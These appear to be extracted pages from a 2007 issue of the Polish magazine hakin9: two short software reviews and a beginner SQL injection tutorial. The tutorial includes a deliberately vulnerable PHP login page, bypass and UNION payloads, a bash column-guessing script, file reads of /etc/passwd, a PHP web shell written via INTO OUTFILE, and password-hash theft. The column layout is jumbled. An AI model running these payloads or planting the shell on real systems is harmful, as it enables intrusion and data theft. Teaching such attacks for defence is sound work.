12 Directory Opus 9 Narzędzia Producent: GP Software System: Windows 2000/XP/2003/Windows Vista Typ: Menadżer plików Strona producenta: Strona dystrybutora: Ocena: 5/5 Directory Opus (DOpus) to flagowy produkt firmy GPSoftware. DOpus jest menadżerem plików przeznaczonym pod Windows a (także pod najnowszą Vistę). Jego pierwsze wersje powstały na początku lat dziewięćdziesiątych. Najnowsza wersja (9) dodaje wiele nowych funkcji, przez co program jest lepszy. Jego układ oparty jest na panelach, podobnie jak Total Commandera (TC), jednak DOpus posiada znacznie większe możliwości. Pierwszą bardzo dużą zaletą jest podział na style, zakładki i panele. Interfejs jest dowolnie konfigurowalny możemy otworzyć tyle paneli, ile tylko chcemy, w jakimkolwiek położeniu (horyzontalnie i wertykalnie). Style natomiast są to predefiniowane układy paneli podwójny poziomy, pionowy, eksplorator, przezrocze, obrazy czy pojedynczy każdy z nich posiada inne przeznaczenie. Korzystanie z nich to sama przyjemność, gdyż mamy możliwość innego prezentowania plików w zależności od ich zawartości (możemy także definiować własne style). Zakładki niczym się nie różnią od tych znanych z przeglądarek, jednakże możemy zapisać układ wszystkich zakładek w folderze ulubionych i jednym kliknięciem przywracać stan DOpus a. Nie zabrakło obsługi protokołu FTP czy skompresowanych plików. Bardzo przydatnym dodatkiem jest możliwość wysyłania zdjęć do serwisu Flickr przy użyciu menu kontekstowego opublikujemy nasze ulubione zdjęcia bez korzystania z przeglądarki. Niestety, jedynym mankamentem DOpus a są skróty klawiaturowe. Jest ich bardzo dużo i trzeba się do nich przyzwyczaić, jednak bez większych problemów udało mi się je zmienić na te znane z TC. Doszliśmy do kolejnego etapu konfiguracji. Ustawienia trzeba liczyć w setkach (co jest zaletą). Autorzy programu postanowili zamieścić wyszukiwarkę do poruszania się po ustawieniach. Ich modyfikowanie możemy zacząć od dźwięków, przez udostępnianie, aż po integrację z systemem. Po kilku dniach pracy z programem skorzystałem z tej ostatniej możliwości i do teraz używam DOpus a jako zamiennika Eksploratora Microsoftu. Integracja jest bezproblemowa tj. działają menu kontekstowe, wszystkie foldery systemowe (Mój komputer, Panel sterowania, itp.), dodana jest także możliwość uruchamiania przez podwójne kliknięcie w dowolnym miejscu Pulpitu. Średnie zużycie pamięci przez DOpus a wynosi ok. 40 MB, ale w dzisiejszych czasach jest to rozsądna wielkość, zważywszy na możliwości, jakimi dysponuje program. Uruchamia się bardzo szybko (włącza się razem z systemem i rezyduje w pamięci), a użytkownik nie odczuwa przy tym żadnego dyskomfortu. Nie można w nim odnaleźć wad Windowsowego menadżera plików DOpus nie zawiesza się, nawet przy przeglądaniu folderów z dużą ilością zdjęć z miniaturkami. Directory Opus jest programem posiadającym same zalety i niemal nieograniczone możliwości, co czyni go niezwykle przydatnym. Pomimo, że jest to program komercyjny (po przeliczeniu kosztuje około 200zł), wart jest swojej ceny i mogę go polecić każdemu użytkownikowi systemów korporacji z Redmond. Amadeusz Jasak Rysunek 1. Zrzut ekranu oprogramowania Opus9 Rysunek 2. Interface menadżera plików Opus9 12 hakin9 Nr 10/2007

13 Narzędzia ConceptDraw MINDMAP 5 Professional Producent: Computer Systems Odessa System: Windows XP Typ: Mind Mapping Strona producenta: Strona dystrybutora: Ocena: 4/5 Każdy, kto rozpoczyna działalność gospodarczą, potrzebuje biznes planu, który określi opłacalność przedsięwzięcia. Najprostszym na to sposobem jest zbudowanie mapy myśli wykresu dokładnie obrazującego wszystkie pomysły. I tu przychodzi nam z pomocą program MINDMAP, który świetnie się do tego celu nadaje. MINDMAP 5 Professional to aplikacja pozwalająca na przygotowywanie prezentacji graficznych, które są pomocne przy tworzeniu różnego rodzaju projektów. Jej zaletą jest również to, że może zobrazować strukturę firmy, a nawet zadania, które mamy zamiar wykonać. Program pomaga również w rozwiązywaniu różnego rodzaju problemów czy też... tworzeniu drzewa genealogicznego. Program jest idealny do przedstawiania zarówno prostych, jak i profesjonalnych materiałów edukacyjnych. Pasek narzędzi pozwala na zmianę struktury mapy myśli oraz na dodawanie, usuwanie i edytowanie poszczególnych jej części. Istnieje także możliwość używania symboli, które pomagają w określeniu tematów, jak również w ich zapamiętaniu. Do programu można importować obrazki oraz wklejać cliparty. Tworząc nowy temat można dodać do niego komentarz, notatkę, a nawet hiperłącze. Jest też wiele możliwości formatowania tekstu oraz obrazków, poczynając od zmiany czcionki aż po zaawansowane metody graficzne. W porządkowaniu tego wszystkiego pomaga nam drzewo, ukazujące całą strukturę mapy. Boczny pasek pokazuje wszystkie strony w dokumencie, co jest wręcz niezbędne przy edycji rozbudowanych map.. Bardzo przydatną funkcją jest możliwość ukrywania gałęzi Rysunek 3. Zrzut ekranu programu MINDMAP 5 Professional mapy pozwala to zaprezentować główną ideę dokumentu oraz jego poszczególne podtematy. Jedną z zalet programu jest to, że choć dostępny w wersji angielskiej, to obsługuje polskie znaki diakrytyczne. Gdy nasza mapa nie mieści się na jednej stronie, istnieje możliwość rozbicia jej na dwie lub więcej kart. Kolejną ciekawą funkcją programu jest burza mózgów pozwala ona tworzyć pomysły i dyskutować o nich w grupie osób. Wystarczy zapisać swoje myśli, a program przekształci je w mapę myśli, którą możemy edytować, rozwijać i organizować. Pomiędzy poszczególnymi myślami tworzymy relacje, a następnie je formatujemy. Burzę mózgów można ograniczyć czasowo, ustawiając odpowiednią wartość we właściwościach mapy. Aby urozmaicić naszą mapę myśli, można dodawać figury geometryczne, linie proste i krzywe oraz cliparty. Profesjonalna baza clipartów, która zawiera ich aż 100, sprawia, że tworzenie mapy myśli staje się bardziej atrakcyjne, a sam efekt łatwiejszy w odbiorze. Całą naszą pracę można zapisać w postaci projektu, który zajmuje niewiele miejsca na dysku, a następnie wydrukować. I tu pojawia się problem, ponieważ podczas próby zapisu widzimy komunikat informujący o błędnym działaniu programu na szczęście projekt zostaje mimo to zapisany. Kolejnym problemem jest fakt, że zapisanego projektu... nie da się otworzyć, co znacznie utrudnia pracę z programem. Producent na swoim forum zapewnia jednak, że błąd pojawiający się w wersji 5.0 jest wyeliminowany w wersji Program MINDMAP 5 pomaga stworzyć prezentację bardziej efektywną oraz przedstawić ją w bardziej interesujący sposób niż MS PowerPoint. Po zakończeniu pracy projekt możemy eksportować do prezentacji PowerPointa, pliku graficznego, a nawet strony internetowej. MINDMAP 5 Professional zaskakuje swoimi możliwościami oraz wbudowanymi narzędziami. Program wart jest swojej ceny, choć nie każdego będzie na niego stać. Uważam, że nadaje się on bardziej dla firm niż do zastosowań domowych, ale na pewno pomoże przy nauce nudnych tematów. Ciekawostką jest to, że program poza systemem Windows działa również na platformie Mac. Po instalacji zajmuje niewiele miejsca na dysku (50MB). Niestety nie ma polskiej wersji językowej. Pomoc programu jest bardzo dobra porusza wszystkie problemy związane z tworzeniem mapy, wadą jest jedynie język angielski. Biorąc pod uwagę jego możliwości i cenę, program jest wart uwagi. Paweł Malinowski hakin9 Nr 10/

14 Ataki SQL Injection w praktyce Początki Dawid Gołuński stopień trudności Bazy danych są dziś nieodłączną częścią nowoczesnych aplikacji internetowych, takich jak sklepy internetowe czy serwisy aukcyjne. Język SQL, używany do komunikacji z bazą, choć oferuje wiele możliwości, stwarza też pewne zagrożenia. Wystarczy moment nieuwagi, aby pozostawione bez kontroli zapytanie posłużyło do przejęcia wrażliwych danych. Zacznijmy od utworzenia przykładowej tabeli o nazwie wwwusers, zawierającej następujące pola: id, name, login, pass. W tym celu skorzystamy z narzędzia mysql monitor, które doskonale nadaje się do testowania wszelkich zapytań i wyłapywania błędów. Proces tworzenia tabeli został przedstawiony na Listingu 1. Następnie, zgodnie z Listingiem 2. tworzymy prostą stronę internetową uwierzytelniającą użytkowników na podstawie haseł znajdujących się w bazie danych. Podatność na ataki źródło problemu Przedstawiony skrypt PHP używa zapytania SELECT do wybrania rekordu zawierającego podany login i hasło. Jeśli serwer w odpowiedzi zwróci przynajmniej jeden rekord, użytkownik zostanie zalogowany. Teoretycznie, zalogowanie bez znajomości hasła jest niemożliwe. Niestety, skrypt zawiera bardzo istotną lukę dane pobierane od użytkownika nie są w żaden sposób filtrowane. Stanowią one część dynamicznie utworzonego zapytania, przekazywanego do bazy. Oznacza to, że osoba odwiedzająca stronę ma bezpośredni wpływ na końcową formę zapytania! Brak lub niedostateczne filtrowanie danych pobranych od użytkownika może umożliwić wstrzyknięcie dodatkowego kodu SQL do podstawowego zapytania. Stąd nazwa ataku SQL Injection. Zalogowanie bez znajomości hasła Wyobraźmy sobie sytuację, w której ktoś wprowadzi w polu Username wartość dave'-- _ (ostatni znak to spacja), natomiast w polu Password dowolny ciąg znaków, np. nieznane. Skrypt po podstawieniu wartości obu pól utworzy takie oto zapytanie: Z artykułu dowiesz się czym są, jakie niosą zagrożenia oraz na czym polegają ataki SQL Injection, poznasz techniki używane podczas ataku, poznasz podstawowe metody obrony. Co powinieneś wiedzieć powinieneś znać podstawy języka SQL, powinieneś znać podstawy administracji systemem Linux oraz serwerem MySQL, powinieneś znać podstawy PHP, C oraz basha. 14 hakin9 Nr 10/2007

15 Ataki SQL Injection w praktyce SELECT * FROM wwwusers WHERE login='dave'-- ' AND pass='nieznane' Uwierzytelnienie przebiegnie dokładnie tak samo, jak w przypadku podania poprawnego hasła. Dzieje się tak dlatego, że dwa myślniki oznaczają w Listing 1. Budowa tabeli wwwusers składni SQL komentarz, co sprawia, że dalsza część zapytania zostaje kompletnie zignorowana przez serwer. Otrzymujemy więc zapytanie: SELECT * FROM wwwusers WHERE login='dave' które zwróci wiersz zawierający wyraz dave w polu login. Zalogowanie bez loginu oraz hasła Podając w pierwszym polu ciąg nobody' OR 1=1--, a w drugim podobnie jak poprzednio dowolny wyraz, otrzymamy zapytanie: mysql> CREATE TABLE wwwusers >(id int, name char(25), login char(25), pass char(25)); mysql> INSERT INTO wwwusers > VALUES('1', 'Dave', 'dave', 'secretdbpass'); mysql> INSERT INTO wwwusers > VALUES('2', 'John', 'john_usr', 'johnpassword'); mysql> INSERT INTO wwwusers > VALUES('3', 'Paul','admin','pass-www'); mysql> SELECT * FROM wwwusers; id name login pass Dave dave secretdbpass 2 John john_usr johnpassword 3 Paul admin admin-www rows in set (0.00 sec) Listing 2. Strona login.php <HTML> <BODY> <FORM name="log_form" method="post"> Username: <INPUT type="edit" name="user"> Password: <INPUT type="edit" name="pass"> <INPUT type="submit" value="log in"> </FORM> <?php if ( isset($_post['user']) && isset($_post['pass']) ){ $user = $_POST['user']; $pass = $_POST['pass']; } else die("nie przeslano danych"); $conn = mysql_connect("localhost","user","pass") or die("brak polaczenia z baza"); mysql_select_db("baza_danych") or die("nie ma takiej bazy"); /* Utworzenie zapytania w oparciu o przekazane wartosci */ $query = "SELECT * FROM wwwusers WHERE login='$user' AND pass='$pass'"; echo "<br>zapytanie wyslane do bazy:<br>". $query. "<br>"; /* Przeslanie zapytania do bazy */ $res = mysql_query($query); if (!$res) echo "<br>". mysql_error(). "<br>"; $record = mysql_fetch_row($res); /* Jesli serwer znalazl rekord to uzytkownik zostaje zalogowany*/ if ($record) { echo "<br>hello <b>$record[2]</b>! Oto twoje dane: <br><br>"; echo "<TABLE border=1><tr>"; echo "<td>id</td> <td>$record[0]</td></tr>"; echo "<tr><td>name</td> <td>$record[1]</td>"; echo "<tr><td>login</td> <td>$record[2]</td>"; echo "<tr><td>pass</td> <td>$record[3]</td></tr></table>"; } else echo "<br><b>podales zle haslo, lub login</b>";?> </BODY> </HTML> SELECT * FROM wwwusers WHERE login='nobody' OR 1=1 -- ' AND pass='nieznane' Co można przetłumaczyć jako pokaż wszystkie rekordy, w których pole login jest równe wyrazowi nobody albo 1=1. Drugie wyrażenie (1=1) jest zawsze prawdziwe dlatego mimo, że w bazie nie ma użytkownika nobody, dopasowane zostaną wszystkie rekordy zawarte w tabeli. W efekcie użytkownik zostanie zalogowany. Przechwycenie haseł Skrypt odczytuje jedynie pierwszy rekord zwrócony przez serwer. Dlatego stosując operator OR zobaczymy dane tylko pierwszego użytkownika. Aby zmusić skrypt do wyświetlenia kolejnych rekordów, zastosujemy kolejny operator LIMIT, którego wywołanie ma postać: LIMIT {[offset,] row_count} gdzie offset to przesunięcie określające, ile początkowych wierszy należy pominąć, a row _ count to ilość wierszy, którą chcemy otrzymać. Dodając do poprzedniego zapytania ciąg LIMIT 1,1 zostaniemy zalogowani jako kolejny, znajdujący się na drugim miejscu tabeli użytkownik john _ usr. Zwiększając dalej offset dojdziemy do hasła administratora. Ograniczenia Dotychczas wstrzykiwany kod stanowił jedynie parametry dla polecenia SELECT. Powstaje pytanie, czy istnieje szansa na wykonanie kolejnego niezależnego od pierwszego polecenia w ramach jednego zapytania? Do rozdzielania komend służy znak średnika. Po wprowadzeniu podczas logowania ciągu '; DROP TABLE wwwusers--, koń- hakin9 Nr 10/

16 Początki cowe zapytanie będzie wyglądało tak: SELECT * FROM wwwusers WHERE login='';drop TABLE wwwusers Zamiast spodziewanego efektu (skasowanie tabeli) otrzymamy jednak błąd: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';DROP Spowodowane jest to tym, że funkcja mysql _ query() nie pozwala wykonać dwóch rozłącznych zapytań w czasie jednego wywołania. Ogranicza to znacznie zakres ataku - nawet w przypadku całkowitego braku kontroli danych wejściowych. Mimo to, z pomocą operatora UNION, istnieje możliwość wykonania dodatkowych instrukcji SELECT. The used SELECT statements have a different number of columns Należy tu zauważyć, że pierwszy (zawarty w skrypcie PHP) SELECT wybiera wszystkie cztery pola (symbol *) tabeli wwwusers, natomiast drugi tylko dwa. Problem można rozwiązać poprzez wstawienie dowolnych wartości liczbowych w miejsce brakujących pól. Po wstawieniu liczb 1 i 2 końcowe zapytanie będzie wyglądało tak: SELECT * FROM wwwusers WHERE login='nic' UNION SELECT 1, 2, name, number FROM contact Jest ono jak najbardziej poprawne i da w wyniku wszystkie rekordy tabeli contact. Wynik nie zawiera rekordów z tabeli wwwusers, ponieważ żaden z nich nie został dopasowany (login nic nie istnieje). Serwer SQL Aby klient mógł przeprowadzić jakąkolwiek operację na bazie danych, musi istnieć serwer SQL. Rolą serwera jest przyjmowanie zapytań od klientów, wykonywanie żądanych operacji na bazie oraz przedstawianie wyników. Serwer bazy danych zarządza również użytkownikami i uprawnieniami. Do bardziej znanych serwerów należą: MySQL, PostgreSQL, MsSQL, Oracle. W tym artykule skoncentrowano się głównie na serwerze MySQL, który jest jednym z najpopularniejszych ze względu na szybkość działania, otwartość kodu i przenośność. Wiele opisanych technik powinno znaleźć zastosowanie również w przypadku innych serwerów baz danych. odwiedzający stronę ma wpływ (może je modyfikować). Są to w szczególności: Pobieranie informacji z innych tabel Obok tabeli wwwusers tworzymy tabelę contact - zgodnie z Listingiem 4. Aby wydobyć z niej informacje, posłużymy się operatorem UNION. Wpisując w formularzu: nic' UNION SELECT name,number FROM contact-- otrzymamy błąd: Przebieg ataku na bazę danych Jeżeli atakujący nie posiada konta na serwerze, a wynik skanowania portów nie przyniósł rezultatów, kolejnym krokiem w przełamaniu zabezpieczeń serwera może być przeszukanie strony WWW pod kątem błędów PHP/SQL. Gdzie wstrzyknąć kod? Na atak narażone są wszelkie miejsca kontaktu użytkownik-skrypt, na które Rysunek 1. Wpływ danych wejściowych na końcowe zapytanie Rysunek 2. Oszukanie skryptu login.php przy pomocy operatora OR wszelkiego typu pola edycyjne, parametry przekazywane w adresie URL, ciasteczka (cookies), ukryte pola formularzy, rozwijane listy wyboru, pola wyboru (checkbox, radio). W przypadku słabo zabezpieczonych stron internetowych zwykle udaje się odnaleźć niefiltrowaną zmienną wśród parametrów adresu URL. Mając do czynienia z lepiej zabezpieczonymi witrynami, warto sprawdzić mniej oczywiste miejsca, jak np. listy wyboru. Programiści często mylnie zakładają tu, że użytkownik posiada wybór ograniczony jedynie do elementów rozwijanej listy. Nic nie stoi przecież na przeszkodzie, aby stronę HTML zawierającą formularz z taką listą zapisać na dysku, a następnie zmodyfikować jedną z jej pozycji. Czasem poszukiwania, ze względu na dużą ilość potencjalnie niefiltrowanych miejsc, wymagają nawiązania sporej ilości połączeń z serwerem WWW. Takie próby zostają odnotowane w logach. Dlatego ataki przeprowadzane są zwykle przy użyciu serwerów pośredniczących (proxy). 16 hakin9 Nr 10/2007

17 Ataki SQL Injection w praktyce Serwer zwraca błąd W zależności od tego, gdzie trafi wstrzyknięty kod, komunikat błędu może informować o nieprawidłowej składni, nieistniejącej nazwie pola, błędnej wartości dla pola danego typu itp. Przypuśćmy, że zmieniając parametr c w adresie shop/index.php?pid=1&c=2 na c=abc2 serwer zwrócił błąd: Unknown column 'abc2' in 'where clause' W takim przypadku można domyślić się, że gdzieś w pliku index.php istnieje funkcja konstruująca zapytanie podobne do: SELECT * FROM produkty_tab WHERE c=$_get['c'] Odczytana z tablicy GET zmienna c nie jest ograniczona apostrofami, ponieważ programista nie przewidział wystąpienia w tym miejscu wartości innej niż liczbowa. Dlatego wstawienie ciągu znaków abc2 sprawia, że serwer próbuje odwołać się do tej wartości jak do nazwy pola, które jak wynika z komunikatu nie istnieje. Pierwszy zastrzyk Wiedząc, że zmienna c musi być liczbą i nie jest ograniczona apostrofami, można spróbować wykorzystać operator UNION w celu wstrzyknięcia dodatkowego polecenia. Przypisanie c=2 UNION SELECT 1-- utworzy zapytanie: Parę słów o UNION UNION jest operatorem pozwalającym scalić ze sobą wyniki dwóch lub większej ilości zapytań SELECT. Zrozumienie istoty jego działania jest niezmiernie ważne, gdyż stanowi podstawę większości ataków. Wstrzyknięty kod z reguły trafia na koniec zapytania dynamicznie utworzonego przez skrypt PHP. Atakujący nie ma możliwości zmiany zdefiniowanego na jego początku polecenia SQL, ani też dodania nowego po średniku. Jedyną możliwością ingerencji jest wtedy użycie UNION. Schemat wywołania tego operatora prezentuje się tak: SELECT... FROM... UNION SELECT... FROM... UNION... W odpowiedzi na tak skonstruowane zapytanie serwer najpierw wykona pierwsze polecenie SELECT, następnie drugie dostawiając jego wynik do rezultatu pierwszego polecenia itd. Każde z poleceń składowych może odwoływać się do różnych tabel, pól, a także posiadać dodatkowe warunki i parametry, niezależne od pozostałych. Istnieje tu jednak ograniczenie każdy SELECT musi wybierać identyczną liczbę pól. Ponadto odpowiadające sobie pola powinny być tego samego typu (w innym przypadku część serwerów odrzuci zapytanie). SELECT * FROM produkty_tab WHERE c=2 UNION SELECT 1-- Jeżeli skrypt nie dokona filtracji kodu, a tabela produkty _tab okaże się zawierać większą liczbę kolumn serwer zwróci błąd: The used SELECT statements have a different number of columns Liczba kolumn może zostać ustalona poprzez kolejne wstawianie cyfr po przecinkach, do momentu aż serwer nie wyświetli błędu: Listing 3. Prosty przykład użycia UNION /* Wynik pierwszego zapytania SELECT */ SELECT imie,nazwisko FROM tabela1 WHERE imie='jan' imie nazwisko Jan Kowalski /* Wynik drugiego zapytania SELECT */ SELECT miasto,kraj FROM tabela miasto kraj Poznan Polska Warszawa Polska /* Zestawienia ze sobą wyników obu zapytań SELECT */ SELECT imie,nazwisko FROM tabela1 WHERE imie='jan' UNION SELECT miasto,kraj FROM tabela imie nazwisko Jan Kowalski Poznan Polska Warszawa Polska c=2 UNION SELECT 1,2-- c=2 UNION SELECT 1,2, Niektóre tabele mogą zawierać dziesiątki kolumn, dlatego ustalenie właściwej liczby może zająć sporo czasu. Nasze zadanie może jednak zostać w pełni zautomatyzowane skryptem z Listingu 6. Po przesłaniu zapytania z właściwą liczbą kolumn na stronie powinny ukazać się wybrane cyfry. Jeżeli ich nie widać, atakowany skrypt najpewniej wyświetla tylko pierwszy rekord. Można temu zaradzić dodając operator LIMIT 0, który usunie wynik uzyskany z pierwszego polecenia SELECT. Where are we, czyli rekonesans Po nawiązaniu komunikacji z bazą można przystąpić do rozpoznawania środowiska, w jakim pracuje atakowany skrypt. Chcąc dowiedzieć się, na jakim koncie serwera SQL pracuje skrypt, wystarczy skorzystać z wbudowanej funk- hakin9 Nr 10/

18 Początki Listing 4. Budowa tabeli contact mysql> CREATE TABLE contact >(name char(25), number char(25); mysql> INSERT INTO contact VALUES('Mike', ' '); mysql> INSERT INTO contact VALUES('Tom', ' '); mysql> SELECT * FROM contact; name number Mike Tom rows in set (0.00 sec) Listing 5. Kod HTML listy wyboru <form name="locale" method="post" action="country.php"> <b>country/region:</b><br> <SELECT name="country" size="10"> <option value="afghanistan en-in">afghanistan</option> <option value="' UNION SELECT 1,2-- ">' UNION SELECT 1,2-- </option>... </SELECT> Listing 6. Skrypt num_of_cols.sh odgadujący liczbę kolumn #!/bin/bash # Skrypt probuje odgadnac liczbe kolumn tabeli poprzez wstawienie # ciagu: UNION SELECT 1-- w oznaczone (przez: _HERE_) miejsce adresu # URL i stopniowe zwiekszanie liczby wybieranych cyfr - do momentu az serwer # przestanie zwracac blad. Przed uruchomieniem trzeba ustawic zmienna PROXY # Uzycie:./script.sh [URL with _HERE_ keyword] [number_of_tries] # Przyklad: #./script.sh " 30 SKIP=0; PROXY="x.x.x.x:80"; sql="%20union%20select%201--%20"; if [ $# -lt 1 ]; then echo "read ussage!"; exit 1; fi if [ $# -eq 2 ] then try_count=$2; echo -e"trying $try_count times\n" else try_count=40; fi; add_columns() { sql=`echo $sql sed 's/--%20//g'`; sql="${sql},$((i+1))--%20"; } for (( i=1; i<=$try_count; i++ )) do if [ $SKIP -ne 0 ]; then SKIP=$((SKIP-1)); add_columns; continue; fi; url=`echo $1 sed "s/_here_/$sql/"`; echo "($i) Trying URL: $url..."; if! curl -x "$PROXY" "$url" lynx --dump -stdin grep -A4 -B4 SQL grep -i different; then echo echo "I found it! The number of columns is $i" echo -e "The correct URL is: \n$url\n\n" exit 0 fi; add_columns; echo; done; cji user(), która zwróci potrzebne informacje (w postaci user@host). Aby rezultat funkcji był widoczny, jej wywołanie musi zostać umieszczone w miejscu jednej z cyfr, które ukazały się na stronie w trakcie ustalania liczby kolumn, np.: SELECT 1,user(),3,4,5,6,7,8-- W uzyskaniu pozostałych informacji pomocne mogą okazać się również zmienne systemowe. Przykładowo, aby dowiedzieć się, na jakim systemie pracuje baza, można wykorzystać zmienną version _ compile _ os, której wartość ustali zapytanie: Zagłębianie się w system Mając podstawowe informacje o koncie oraz systemie, możemy pokusić się o użycie funkcji load _ file() w celu odczytania plików konfiguracyjnych systemu. Oczywiście podany jako parametr plik musi posiadać uprawnienia zezwalające procesowi serwera bazy na odczyt. Przykładami plików, które często posiadają takie uprawnienia, a zarazem dostarczają istotnych informacji są: /etc/passwd, /etc/inittab, /etc/my.cnf, /etc/inetd.conf, httpd.conf, skrypty startowe rc, niektóre dzienniki serwera (w tym logi SQL). Poznanie dokładnej wersji systemu zazwyczaj ogranicza się do odczytania pliku o nazwie w rodzaju /etc/redhat-release. Taka informacja zdradza umiejscowienie innych plików konfiguracyjnych charakterystycznych dla danej dystrybucji systemu. Czytanie skryptów PHP Oprócz wspomnianych plików, często możliwy jest odczyt źródeł aplikacji PHP. Źródła strony mogą zawierać niezakodowane hasła do baz danych (przekazane do funkcji mysql _ connect()), jak również zdra- 18 hakin9 Nr 10/2007

19 Ataki SQL Injection w praktyce Jest szansa, że programista w celu zapewnienia poprawnej pracy skryptu nadał katalogowi mail uprawnienia o+w. W takim wypadku wystarczy napisać krótki skrypt PHP wykonujący komendy podane jako parametr $cmd: <?php $cmd = $_GET['cmd']; $out = system("$cmd");?> Rysunek 4. Skrypt num_of_cols.sh w akcji dzić inne trudne do wykrycia z zewnątrz rodzaje błędów. Po połączeniu informacji o położeniu katalogu domowego (plik passwd) z nazwą katalogu przechowującego strony (plik httpd.conf), możemy próbować odczytać pliki indeksowe: load_file('/home/user_name/html_dir/ index.php') Prawdopodobieństwo odczytania pliku jest stosunkowo duże, ponieważ część administratorów nadaje katalogowi html _ dir i jego plikom prawa o+rx. Odczytanie pliku indeksowego wystarczy, aby śledząc odwołania typu include() dotrzeć do nazw kolejnych plików skryptu. Warto tu również wspomnieć o funkcji hex(), która pozwoli skonwertować odczytany plik na postać szesnastkową. Przydaje się to zwłaszcza do odczytywania plików zawierających znaki niedrukowalne. Pozwala też zapobiec interpretacji kodu przez właściwy skrypt lub przeglądarkę. Pisanie do plików MySQL oferuje możliwość zapisu do wskazanego pliku poprzez parę operatorów polecenia SELECT: OUTFILE i DUMPFILE. Odbywa się to w taki oto sposób: SELECT * FROM tabela INTO OUTFILE '/sciezka/do/pliku' Ze względów bezpieczeństwa nadpisywanie plików jest zabronione, dlatego ścieżka musi wskazywać nieistniejący plik. Mimo to operatory te stanowią duże zagrożenie. Wystarczy wyobrazić sobie, że podczas przeglądania źródeł PHP natrafiliśmy na fragment: $file = fopen("mail/list1.txt","w"); fwrite($file,"$ \n"); Trzy zapytania do information_schema SELECT schema_name FROM information_schema.schemata, SELECT table _ name FROM information _ schema.tables WHERE table _ schema='wybrana _ baza', SELECT column _ name FROM information _ schema.columns WHERE table _ schema='wybrana _ baza' AND table _ name='wybrana _ tabela' uzyskamy odpowiednio: listę wszystkich dostępnych baz, kompletną listę tabel bazy wybrana_baza, oraz kompletną listę pól zawartych w bazie wybrana_baza. Posiadając te informacje możemy już kierować zapytania do konkretnych tabel. Taki skrypt po konwersji na postać szesnastkową może zostać zapisany na serwerze z pomocą operatora OUTFILE. Po pomyślnym wykonaniu zapytania przedstawionego na Listingu 7. uzyskamy możliwość wykonywania komend powłoki z uprawnieniami procesu serwera WWW: ~user1/mail/run.php?cmd=ps. Czytanie baz danych Podstawowy problem związany z wyciąganiem informacji z nieznanej bazy wiąże się z nieznajomością jej struktury. Zazwyczaj nie jesteśmy w stanie przewidzieć nazw baz, tabel czy kolumn. Czasem informacje te pojawiają się w generowanych przez serwer komunikatach o błędach, lecz są to tylko szczątkowe dane. Nowsze wersje serwera MySQL udostępniają specjalną bazę information _ schema, która znakomicie ułatwia pracę z nieznanymi danymi. W celu przyspieszenia operacji odczytu danych z bazy można wykorzystać funkcję concat(), która pozwala scalić wartości kilku pól w jeden ciąg znaków. Przykładowo, zapytanie: SELECT concat('[ ',imie,'=', nazwisko,'=', telefon,'=', mail,' ]') FROM sklepdb.zamowienia wyświetli zawartość czterech pól tabeli zamowienia, rozdzielone znakami równości. Kradzież haseł Serwer MySQL przechowuje informacje o użytkownikach w bazie danych o nazwie mysql. Baza ta zawiera dane potrzebne do autoryzacji użytkowników, a także określa przy- hakin9 Nr 10/

20 Początki Rysunek 5. Wyświetlenie wyniku funkcji user() na atakowanej stronie sługujące im przywileje. Kluczowa tabela w niej zawarta to user, która posiada m. in. następujące pola: user nazwa użytkownika, host host, z którego użytkownik ma prawo się łączyć, password zaszyfrowane hasło w postaci skrótu (hash). Domyślnie tylko użytkownik o loginie root ma do niej dostęp. Jednak zdarza się, że administrator definiując dostępne obiekty dla nowego użytkownika wpisuje po prostu *.* co oznacza wszystkie bazy i tabele, łącznie z mysql.user. Skróty haseł różnią się między sobą długością. Krótsze wynikają z zastosowania starszego mechanizmu generowania hashy używanego w wersjach serwera MySQL starszych niż 4.1. Takie hasła są bardzo podatne na atak siłowy (brute force). Czas siłowego złamania 7-znakowego hasła zawierającego różnej wielkości litery, cyfry czy nawet znaki specjalne, na przeciętnym komputerze nie przekracza zwykle 5 minut. Należy pamiętać, że rozkodowanie hasła nie gwarantuje uzyskania dostępu do bazy. O tym, czy dany użytkownik będzie mógł zalogować się na dane konto decyduje pole host. Jeśli jest ono puste lub zawiera znak %, oznacza to, że na konto można zalogować się z dowolnego miejsca. Czy jednak hasła kont zezwalających wyłącznie na dostęp z lokalnego adresu są zupełnie bezużyteczne? Bynajmniej istnieje przecież szansa, że użytkownik posiada również konto systemowe (z dostępem do powłoki) z identycznym hasłem. Posiadając hasło do konta, które zezwala na zdalny dostęp, możemy uzyskać bezpośrednie połączenie z bazą (poleceniem mysql). Nie będziemy już ograniczeni do polecenia UNION SELECT. Zyskamy możliwość wykonywania pozostałych komend SQL w granicach uprawnień przypisanych do konta. Jeśli konto ma nadane maksymalne uprawnienia z bazą można zrobić praktycznie wszystko. Zdalny dostęp do serwera pozwala też na wykonanie dokładnej kopii wybranej bazy na lokalnym dysku twardym. Służy do tego narzędzie mysqldump, wywołane w taki sposób: mysqldump -u admin -p'pass' \ -h host sklepdb >dump.sql Problemy, na jakie może napotkać atakujący Ataki SQL Injection rzadko kiedy przebiegają bezproblemowo. Trudności w określeniu miejsca pozwalającego na wstrzyknięcie kodu, filtrowanie danych Wbudowane funkcje serwera MySQL wejściowych pod kątem znaków specjalnych czy brak wyświetlania wyników na stronie WWW to tylko część problemów mogących wystąpić podczas ataku. Wystarczająco zdeterminowany napastnik jest jednak w stanie przezwyciężyć niektóre z nich. Magiczne apostrofy Jeśli w konfiguracji PHP aktywowana zostanie opcja magic _ quotes _ gpc, to wszystkie dane pochodzące z zewnątrz (przekazane za pomocą metod GET, POST czy też ciasteczek) zostaną automatycznie zabezpieczone. Jeśli zmienna zawiera znaki:, ' czy \, to przed każdym z nich dopisany zostanie znak odwrotnego ukośnika (\) likwidując w ten sposób specjalne znaczenie każdego z wspomnianych znaków. Zakładając, że omawiana opcja jest aktywna, a w kodzie PHP znajduje się linijka: MySQL oferuje pokaźny zestaw wbudowanych funkcji, które pozwalają na wykonanie określonych czynności po stronie serwera. Stanowią one nieocenioną pomoc dla napastnika. Funkcje najczęściej używane w atakach SQL Injection to: load_file() odczytuje wskazany plik, user() zwraca nazwę aktualnie zalogowanego użytkownika, database() zwraca nazwę aktualnie używanej bazy, sleep() wstrzymuje pracę skryptu na określoną ilość sekund, hex(), unhex() konwersja liczb szesnastkowych, char() zamiana liczby na znak (w kodzie ASCII), concat() połączenie ze sobą ciągów znaków, if() tworzenie warunku, ascii() zwraca kod ASCII podanego znaku, count() zlicza otrzymane rekordy. Zmienne systemowe serwera MySQL Serwer MySQL przechowuje w pamięci dużą ilość zmiennych, które zawierają kluczowe informacje na temat konfiguracji bazy danych, a także o systemie 